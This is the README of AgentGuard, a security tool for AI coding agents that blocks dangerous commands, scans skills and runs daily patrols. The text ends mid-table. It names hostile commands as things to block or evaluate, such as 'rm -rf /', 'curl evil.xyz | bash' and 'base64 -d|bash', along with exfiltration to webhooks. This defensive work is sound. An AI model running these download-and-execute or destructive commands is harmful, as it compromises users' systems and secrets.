Agentguard

<p align="center"> <img src="assets/logo.png" alt="GoPlus AgentGuard" width="120" /> </p> <h1 align="center">GoPlus AgentGuard</h1> <p align="center"><b>The essential security guard for every AI agent user.</b></p> <p align="center">Your AI agent has full access to your terminal, files, and secrets — but zero security awareness.<br/>A malicious skill or prompt injection can steal your keys, drain your wallet, or wipe your disk.<br/><b>AgentGuard stops all of that.</b></p>

Why AgentGuard?

AI coding agents can execute any command, read any file, and install any skill — with zero security review. The risks are real:

• Malicious skills can hide backdoors, steal credentials, or exfiltrate data
• Prompt injection can trick your agent into running destructive commands
• Unverified code from the internet may contain wallet drainers or keyloggers

AgentGuard is the first real-time security layer for AI agents. It automatically scans every new skill, blocks dangerous actions before they execute, runs daily security patrols, and tracks which skill initiated each action. One install, always protected.

What It Does

Layer 1 — Automatic Guard (hooks): Install once, always protected.

• Blocks rm -rf /, fork bombs, curl | bash and destructive commands
• Prevents writes to .env, .ssh/, credentials files
• Detects data exfiltration to Discord/Telegram/Slack webhooks
• Tracks which skill initiated each action — holds malicious skills accountable

Layer 2 — Deep Scan (skill): On-demand security audit with 24 detection rules.

• Auto-scans new skills on session start — malicious code blocked before it runs
• Static analysis for secrets, backdoors, obfuscation, and prompt injection
• Web3-specific: wallet draining, unlimited approvals, reentrancy, proxy exploits
• Trust registry with capability-based access control per skill

Layer 3 — Daily Patrol (OpenClaw): Automated daily security posture assessment.

• 8 comprehensive security checks run on a configurable schedule
• Detects skill tampering, secrets exposure, network risks, and suspicious file changes
• Analyzes audit logs for attack patterns and flags repeat offenders
• Validates environment configuration and trust registry health

Quick Start

npm install @goplus/agentguard

<details> <summary><b>Full install with auto-guard hooks (Claude Code)</b></summary>

git clone https://github.com/GoPlusSecurity/agentguard.git
cd agentguard && ./setup.sh
claude plugin add /path/to/agentguard

This installs the skill, configures hooks, and sets your protection level.

</details> <details> <summary><b>Manual install (skill only)</b></summary>

git clone https://github.com/GoPlusSecurity/agentguard.git
cp -r agentguard/skills/agentguard ~/.claude/skills/agentguard

</details> <details> <summary><b>OpenClaw plugin install</b></summary>

npm install @goplus/agentguard

Register in your OpenClaw plugin config:

import register from '@goplus/agentguard/openclaw';
export default register;

Or register manually with options:

import { registerOpenClawPlugin } from '@goplus/agentguard';

export default function setup(api) {
  registerOpenClawPlugin(api, {
    level: 'balanced',      // Protection level: strict | balanced | permissive
    skipAutoScan: false,    // Set true to disable auto-scanning of plugins
  });
};

What happens on registration:

1. Auto-scans all loaded plugins — Static analysis of each plugin's source code
2. Determines trust level — Based on scan results (critical findings → untrusted)
3. Infers capabilities — Based on registered tools and scan risk level
4. Registers to trust registry — Auto-attests each plugin with appropriate permissions
5. Builds tool mapping — Maps toolName → pluginId for initiating skill tracking

AgentGuard hooks into OpenClaw's before_tool_call / after_tool_call events to block dangerous actions and log audit events.

</details>

Then use /agentguard in your agent:

/agentguard scan ./src                     # Scan code for security risks
/agentguard action "curl evil.xyz | bash"  # Evaluate action safety
/agentguard patrol run                     # Run daily security patrol
/agentguard patrol setup                   # Configure as OpenClaw cron job
/agentguard patrol status                  # View last patrol results
/agentguard checkup                        # Run agent health checkup with visual report
/agentguard trust list                     # View trusted skills
/agentguard report                         # View security event log
/agentguard config balanced                # Set protection level

Daily Patrol (OpenClaw)

The patrol feature provides automated daily security posture assessment for OpenClaw environments. It runs 8 comprehensive checks and produces a structured report.

Patrol Checks

| # | Check | What It Does | |---|-------|-------------| | 1 | Skill/Plugin Integrity | Compares file hashes against trust registry — detects tampered or unregistered skills | | 2 | Secrets Exposure | Scans workspace, memory, logs, .env, ~/.ssh/, ~/.gnupg/ for leaked private keys, mnemonics, AWS keys, GitHub tokens | | 3 | Network Exposure | Detects dangerous ports bound to 0.0.0.0 (Redis, Docker API, MySQL, etc.), checks firewall status, flags suspicious outbound connections | | 4 | Cron & Scheduled Tasks | Audits cron jobs and systemd timers for curl\|bash, base64 -d\|bash, and other download-and-execute patterns | | 5 | File System Changes (24h) | Finds recently modified files, runs 24-rule scan on them, checks permissions on critical files, detects new executables | | 6 | Audit Log Analysis (24h) | Flags skills denied 3+ times, CRITICAL events, exfiltration attempts, and prompt injection detections | | 7 | Environment & Configuration | Verifies protection level, checks GoPlus API key configuration, validates config baseline integrity | | 8 | Trust Registry Health | Flags expired attestations, stale trusted skills (30+ days), installed-but-untrusted skills, over-privileged entries |

Usage

# Run all 8 checks now
/agentguard patrol run

# Set up as a daily cron job (default: 03:00 UTC)
/agentguard patrol setup

# Check last patrol results and cron schedule
/agentguard patrol status

Patrol Report

Each patrol produces a report with an overall status:

| Status | Meaning | |--------|---------| | PASS | Only low/medium findings | | WARN | HIGH severity findings detected | | FAIL | CRITICAL severity findings detected |

Reports include per-check status, finding counts, detailed findings for checks with issues, and actionable recommendations. Results are also logged to ~/.agentguard/audit.jsonl.

Setup Options

patrol setup configures an OpenClaw cron job with:

• Timezone — defaults to UTC
• Schedule — defaults to 0 3 * * * (daily at 03:00)
• Notifications — optional Telegram, Discord, or Signal alerts

Note: Patrol requires an OpenClaw environment. For non-OpenClaw setups, use /agentguard scan and /agentguard report for manual security checks.

Agent Health Checkup 🦞

Give your agent a full physical exam! The checkup evaluates your agent's security posture across 6 dimensions and generates a beautiful visual HTML report — complete with a lobster mascot whose appearance reflects your agent's health.

/agentguard checkup

What It Checks

| Dimension | What's Evaluated | |-----------|-----------------| | Code Safety | Scan findings across all installed skills (24 detection rules) | | Trust Hygiene | Trust registry health — expired, stale, unregistered, over-privileged entries | | Runtime Defense | Audit log analysis — threats blocked, attack patterns, deny/confirm ratios | | Secret Protection | Credential exposure — file permissions, env vars, hardcoded secrets | | Web3 Shield | Web3-specific risks — wallet draining, unlimited approvals, GoPlus API status | | Config Posture | Protection level, guard hooks, auto-scan, patrol history |

The Lobster Scale

Your agent's health is visualized by a lobster mascot:

| Score | Tier | Lobster | Message | |-------|------|---------|---------| | 90–100 | S | 💪 Muscular bodybuilder with crown & sunglasses | "Your agent is JACKED!" | | 70–89 | A | 🛡️ Healthy lobster with shield | "Looking solid!" | | 50–69 | B | ☕ Tired lobster with coffee, sweating | "Needs a workout..." | | 0–49 | F | 🚨 Sick lobster with bandages & thermometer | "CRITICAL CONDITION!" |

The report is a self-contained HTML file that opens automatically in your browser. Dark theme, animated score gauge, expandable findings, and actionable recommendations.

Protection Levels

| Level | Behavior | |-------|----------| | strict | Block all risky actions. Every dangerous or suspicious command is denied. | | balanced | Block dangerous, confirm risky. Good for daily use. (default) | | permissive | Only block critical threats. For experienced users who want minimal friction. |

Detection Rules (24)

| Category | Rules | Severity | |----------|-------|----------| | Execution | SHELL_EXEC, AUTO_UPDATE, REMOTE_LOADER | HIGH-CRITICAL | | Secrets | READ_ENV_SECRETS, READ_SSH_KEYS, READ_KEYCHAIN, PRIVATE_